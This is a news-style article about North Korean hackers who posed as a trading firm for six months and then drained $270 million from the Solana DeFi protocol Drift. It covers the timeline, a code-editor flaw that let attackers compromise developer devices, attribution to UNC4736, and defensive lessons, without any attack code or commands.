North Korean Hackers Stole $270M From Drift by Posing as a Trading Firm for 6 Months
It reads like a spy thriller. A North Korean intelligence group spent six months posing as a legitimate quantitative trading firm, attending crypto conferences, holding technical meetings, depositing over $1 million of their own capital, and building trust with the team behind Solana-based DeFi protocol Drift. Then, on April 1, they drained $270 million from the protocol’s vaults in under a minute.
Drift’s post-mortem reveals one of the most sophisticated social engineering attacks in crypto history — and a terrifying reminder that the biggest security threats aren’t in the code. They’re in the people.
The Six-Month Infiltration
Here’s how the operation unfolded, according to Drift’s disclosure and blockchain intelligence firm Elliptic:
| Timeline | Event |
|---|---|
| Fall 2025 | First contact at a major crypto conference. Attackers posed as a quant trading firm seeking to integrate with Drift. |
| Oct–Nov 2025 | Months of substantive conversations via Telegram about trading strategies and vault integrations. Technically fluent, verifiable backgrounds. |
| Dec 2025–Jan 2026 | Onboarded an Ecosystem Vault on Drift. Multiple working sessions with contributors. Deposited $1M+ of their own capital. |
| Feb–Mar 2026 | Exploited a VSCode/Cursor vulnerability to compromise developer devices. Simply opening a file silently executed arbitrary code. |
| Late March 2026 | Obtained two multisig approvals needed for the attack. Pre-signed transactions sat dormant for over a week. |
| April 1, 2026 | Executed the attack. $270M drained in under one minute from protocol vaults. |
How They Got In: The VSCode/Cursor Vulnerability
The technical attack vector is particularly alarming for the developer community. Drift pointed to a known vulnerability in VSCode and Cursor — two of the most widely used code editors in software development — that the security community had been flagging since late 2025.
The vulnerability: simply opening a file or folder in the editor was sufficient to silently execute arbitrary code. No clicks required. No warnings displayed. Once developer devices were compromised, the attackers had access to the private keys needed to obtain the two multisig approvals that enabled the attack.
This isn’t a smart contract exploit or a DeFi protocol bug. It’s a supply chain attack through the developer’s own tools.
Who Did It?
Blockchain intelligence firms Elliptic and TRM Labs attributed the attack to UNC4736, a North Korean state-affiliated group also tracked as:
- AppleJeus (by Mandiant/Google)
- Citrine Sleet (by Microsoft)
North Korean hackers have stolen an estimated $6+ billion in cryptocurrency since 2017, funding the country’s nuclear weapons and missile programs. The Drift exploit is believed to be one of the largest single thefts in 2026.
What Makes This Attack Different
Most crypto hacks exploit code vulnerabilities — a bug in a smart contract, a flash loan attack, a bridge exploit. The Drift attack was different because it was fundamentally a human intelligence operation:
- In-person meetings at crypto conferences (not just online)
- Verifiable professional backgrounds (likely fabricated or stolen identities)
- $1M+ capital deposit to establish credibility (an investment in the operation)
- 6 months of relationship building before any technical exploitation
- Developer tool exploitation rather than protocol code exploitation
This is espionage, not hacking. The code was sound. The people were compromised.
Lessons for the Crypto and Dev Community
- Update your code editors. The VSCode/Cursor vulnerability has been patched — make sure you’re running the latest version.
- Never open untrusted files in your IDE. Treat code files from external parties like executable attachments.
- Verify identities beyond LinkedIn. North Korean agents had convincing professional profiles. Video calls, background checks, and in-person verification aren’t enough.
- Multisig isn’t magic. If the people holding the keys are compromised, the number of signatures required is irrelevant.
- Time delays on large transactions. The pre-signed transactions sat dormant for a week. Time-locked withdrawals could have caught this.
Frequently Asked Questions
How much was stolen in the Drift Protocol hack?
Approximately $270-285 million was drained from Drift Protocol’s vaults on April 1, 2026, in under one minute. The attack was attributed to UNC4736, a North Korean state-affiliated hacking group.
How did North Korean hackers infiltrate Drift?
The attackers posed as a quant trading firm for six months, attending crypto conferences, holding technical meetings, depositing over $1 million, and building trust. They then exploited a VSCode/Cursor vulnerability to compromise developer devices and obtain multisig private keys.